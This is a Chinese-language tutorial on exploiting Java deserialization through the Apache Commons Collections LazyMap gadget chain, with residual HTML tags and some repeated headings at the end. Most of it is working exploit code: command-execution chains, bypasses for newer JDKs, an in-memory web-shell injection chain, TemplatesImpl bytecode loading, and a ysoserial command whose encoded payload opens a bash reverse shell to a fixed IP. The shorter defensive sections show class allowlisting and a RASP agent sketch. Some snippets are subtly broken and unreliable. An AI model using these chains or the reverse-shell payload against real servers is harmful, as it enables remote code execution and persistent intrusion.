Apache Commons Collections LazyMap深度利用与防御指南<\/h1>

一、LazyMap核心机制<\/h2>
LazyMap是Apache Commons Collections中实现延迟加载的特殊Map实现类，其核心逻辑在于当访问不存在的Key时，会触发Transformer转换器：<\/p>
public<\/span> class<\/span> LazyMap<\/span> extends<\/span> AbstractMapDecorator {<\/span>
<\/span><\/span>    private<\/span> final<\/span> Transformer factory;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (!<\/span>map.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span> \/\/ 当Key不存在时
<\/span><\/span><\/span><\/span>            Object value =<\/span> factory.<\/span>transform<\/span>(<\/span>key);<\/span> \/\/ 触发转换器
<\/span><\/span><\/span><\/span>            map.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>            return<\/span> value;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> map.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键特性：<\/p>

延迟加载机制：只有在首次访问不存在的key时才会触发转换<\/li>
Transformer接口：允许自定义键值转换逻辑<\/li>
装饰器模式：扩展HashMap的功能而不修改其结构<\/li>
<\/ul>
二、经典攻击链构造(CC1)<\/h2>
1. 基础利用代码<\/h3>
\/\/ 构造命令执行链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建LazyMap实例
<\/span><\/span><\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> chain);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过动态代理触发
<\/span><\/span><\/span><\/span>Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span>
<\/span><\/span>    new<\/span> InvocationHandler()<\/span> {<\/span>
<\/span><\/span>        public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>            return<\/span> method.<\/span>invoke<\/span>(<\/span>lazyMap,<\/span> args);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化触发
<\/span><\/span><\/span><\/span>ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>new<\/span> ObjectOutputStream(<\/span>bos).<\/span>writeObject<\/span>(<\/span>proxyMap);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> bos.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化触发漏洞
<\/span><\/span><\/span><\/span>new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>payload)).<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>触发原理<\/h3>

反序列化proxyMap时触发InvocationHandler.invoke()<\/li>
调用LazyMap.get()方法<\/li>
执行ChainedTransformer.transform()链式调用<\/li>
最终执行Runtime.exec()命令<\/li>
<\/ol>
三、绕过技巧<\/h2>
1. JDK 8u71+ 绕过(结合TiedMapEntry)<\/h3>
\/\/ 构造增强版攻击链
<\/span><\/span><\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> chain);<\/span>
<\/span><\/span>TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "triggerKey"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过HashSet触发
<\/span><\/span><\/span><\/span>HashSet hashSet =<\/span> new<\/span> HashSet(<\/span>1<\/span>);<\/span>
<\/span><\/span>hashSet.<\/span>add<\/span>(<\/span>"foo"<\/span>);<\/span> \/\/ 初始化HashSet
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 反射修改内部Entry
<\/span><\/span><\/span><\/span>Field mapField =<\/span> HashSet.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"map"<\/span>);<\/span>
<\/span><\/span>mapField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>HashMap internalMap =<\/span> (<\/span>HashMap)<\/span> mapField.<\/span>get<\/span>(<\/span>hashSet);<\/span>
<\/span><\/span>
<\/span><\/span>Field tableField =<\/span> HashMap.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"table"<\/span>);<\/span>
<\/span><\/span>tableField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object[]<\/span> table =<\/span> (<\/span>Object[])<\/span> tableField.<\/span>get<\/span>(<\/span>internalMap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 修改第一个节点的key
<\/span><\/span><\/span><\/span>Object node =<\/span> table[<\/span>0<\/span>];<\/span>
<\/span><\/span>Field keyField =<\/span> node.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"key"<\/span>);<\/span>
<\/span><\/span>keyField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>keyField.<\/span>set<\/span>(<\/span>node,<\/span> entry);<\/span> \/\/ 注入恶意Entry
<\/span><\/span><\/span><\/code><\/pre>绕过原理<\/h3>

利用TiedMapEntry.toString()自动调用getValue()<\/li>
HashSet反序列化时自动触发hashCode()计算<\/li>
不依赖动态代理机制，适用于高版本JDK<\/li>
<\/ul>
四、内存马注入技巧<\/h2>
1. Web层内存马(Filter型)<\/h3>
Transformer[]<\/span> memShellChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>()),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"javax.servlet.Filter"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"addFilter"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Filter.<\/span>class<\/span>}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[]{<\/span>"evilFilter"<\/span>,<\/span> new<\/span> MaliciousFilter()}})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> new<\/span> ChainedTransformer(<\/span>memShellChain));<\/span>
<\/span><\/span><\/code><\/pre>2. 字节码驻留技巧<\/h3>
\/\/ 使用TemplatesImpl持久化
<\/span><\/span><\/span><\/span>Transformer[]<\/span> persistChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>TemplatesImpl.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getOutputProperties"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>五、防御对抗艺术<\/h2>
1. 安全反序列化实现<\/h3>
public<\/span> class<\/span> SafeObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> ALLOWED_CLASSES =<\/span> 
<\/span><\/span>        Set.<\/span>of<\/span>(<\/span>"java.lang.String"<\/span>,<\/span> "java.util.ArrayList"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> SafeObjectInputStream<\/span>(<\/span>InputStream in)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        super<\/span>(<\/span>in);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> 
<\/span><\/span>        throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        String className =<\/span> desc.<\/span>getName<\/span>();<\/span>
<\/span><\/span>        if<\/span> (!<\/span>ALLOWED_CLASSES.<\/span>contains<\/span>(<\/span>className))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized class: "<\/span>,<\/span> className);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. RASP防御示例<\/h3>
\/\/ 使用Java Agent拦截关键方法
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> DeserializationAgent<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> premain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> {<\/span>
<\/span><\/span>        inst.<\/span>addTransformer<\/span>((<\/span>loader,<\/span> className,<\/span> classBeingRedefined,<\/span> 
<\/span><\/span>            protectionDomain,<\/span> classfileBuffer)<\/span> -><\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"java\/util\/Map"<\/span>))<\/span> {<\/span>
<\/span><\/span>                ClassReader cr =<\/span> new<\/span> ClassReader(<\/span>classfileBuffer);<\/span>
<\/span><\/span>                ClassWriter cw =<\/span> new<\/span> ClassWriter(<\/span>cr,<\/span> ClassWriter.<\/span>COMPUTE_FRAMES<\/span>);<\/span>
<\/span><\/span>                ClassVisitor cv =<\/span> new<\/span> LazyMapDetector(<\/span>cw);<\/span>
<\/span><\/span>                cr.<\/span>accept<\/span>(<\/span>cv,<\/span> 0<\/span>);<\/span>
<\/span><\/span>                return<\/span> cw.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            return<\/span> classfileBuffer;<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ ASM检测逻辑
<\/span><\/span><\/span><\/span>class<\/span> LazyMapDetector<\/span> extends<\/span> ClassVisitor {<\/span>
<\/span><\/span>    public<\/span> MethodVisitor visitMethod<\/span>(<\/span>int<\/span> access,<\/span> String name,<\/span> String desc,<\/span> 
<\/span><\/span>        String signature,<\/span> String[]<\/span> exceptions)<\/span> {<\/span>
<\/span><\/span>        MethodVisitor mv =<\/span> super<\/span>.<\/span>visitMethod<\/span>(<\/span>access,<\/span> name,<\/span> desc,<\/span> signature,<\/span> exceptions);<\/span>
<\/span><\/span>        if<\/span> (<\/span>name.<\/span>equals<\/span>(<\/span>"get"<\/span>))<\/span> {<\/span>
<\/span><\/span>            mv.<\/span>visitCode<\/span>();<\/span>
<\/span><\/span>            mv.<\/span>visitMethodInsn<\/span>(<\/span>INVOKESTATIC,<\/span> "SecurityMonitor"<\/span>,<\/span> "checkLazyMapAccess"<\/span>);<\/span>
<\/span><\/span>            mv.<\/span>visitEnd<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> mv;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>六、检测与验证<\/h2>
1. 漏洞验证命令<\/h3>
# 使用ysoserial生成payload<\/span>
<\/span><\/span>java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"<\/span> > payload.bin
<\/span><\/span>
<\/span><\/span># 发送到测试环境<\/span>
<\/span><\/span>curl -X POST --data-binary @payload.bin http:\/\/vuln-app\/deserialize
<\/span><\/span><\/code><\/pre>2. 代码审计关注点<\/h3>
\/\/ 危险调用模式
<\/span><\/span><\/span><\/span>ObjectInputStream.<\/span>readObject<\/span>()<\/span>
<\/span><\/span>XMLDecoder.<\/span>readObject<\/span>()<\/span>
<\/span><\/span>JSON.<\/span>parseObject<\/span>(<\/span>input,<\/span> Feature.<\/span>SupportNonPublicField<\/span>)<\/span>
<\/span><\/span>XStream.<\/span>fromXML<\/span>(<\/span>xmlInput)<\/span> \/\/ XStream反序列化
<\/span><\/span><\/span><\/code><\/pre>七、高级利用技巧<\/h2>
1. 利用BadAttributeValueExpException绕过防御<\/h3>
\/\/ 构造LazyMap链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>Transformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> chain);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造TiedMapEntry并注入恶意对象
<\/span><\/span><\/span><\/span>TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "trigger"<\/span>);<\/span>
<\/span><\/span>BadAttributeValueExpException exp =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射设置val属性
<\/span><\/span><\/span><\/span>Field valField =<\/span> exp.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>valField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>valField.<\/span>set<\/span>(<\/span>exp,<\/span> entry);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>exp);<\/span>
<\/span><\/span><\/code><\/pre>2. 非Runtime.exec()执行方式<\/h3>
\/\/ 基于类加载的字节码注入
<\/span><\/span><\/span><\/span>String code =<\/span> "public class Evil { static { Runtime.getRuntime().exec(\"calc\"); } }"<\/span>;<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytecode =<\/span> new<\/span> JavaCompiler().<\/span>compile<\/span>(<\/span>code);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造TemplatesImpl链
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytecode});<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Evil"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>八、总结与演进方向<\/h2>
攻击趋势<\/h3>

从单一链式调用 → 多技术组合(如JNDI + 反序列化)<\/li>
从本地命令执行 → 远程代码加载(规避本地特征检测)<\/li>
<\/ul>
防御策略<\/h3>

启用SecurityManager限制反射操作<\/li>
使用SerialKiller等安全反序列化库<\/li>
定期更新Commons Collections等组件版本<\/li>
实施最小权限原则，限制敏感操作<\/li>
部署RASP进行运行时保护<\/li>
<\/ol>
演进思考<\/h3>

攻击本质：利用Java反序列化机制将数据结构转换为代码执行<\/li>
防御哲学：输入验证、权限控制、行为监控三位一体<\/li>
未来方向：结合AI技术进行异常行为检测和防御<\/li>
<\/ul>
Apache Commons Collections LazyMap深度利用与防御指南<\/h1>

二、经典攻击链构造(CC1)<\/h2>

三、绕过技巧<\/h2>

四、内存马注入技巧<\/h2>

五、防御对抗艺术<\/h2>

六、检测与验证<\/h2>

七、高级利用技巧<\/h2>

八、总结与演进方向<\/h2>

演进思考<\/h3> 攻击本质：利用Java反序列化机制将数据结构转换为代码执行<\/li> 防御哲学：输入验证、权限控制、行为监控三位一体<\/li> 未来方向：结合AI技术进行异常行为检测和防御<\/li> <\/ul>

演进思考<\/h3>

攻击本质：利用Java反序列化机制将数据结构转换为代码执行<\/li>
防御哲学：输入验证、权限控制、行为监控三位一体<\/li>
未来方向：结合AI技术进行异常行为检测和防御<\/li> <\/ul>
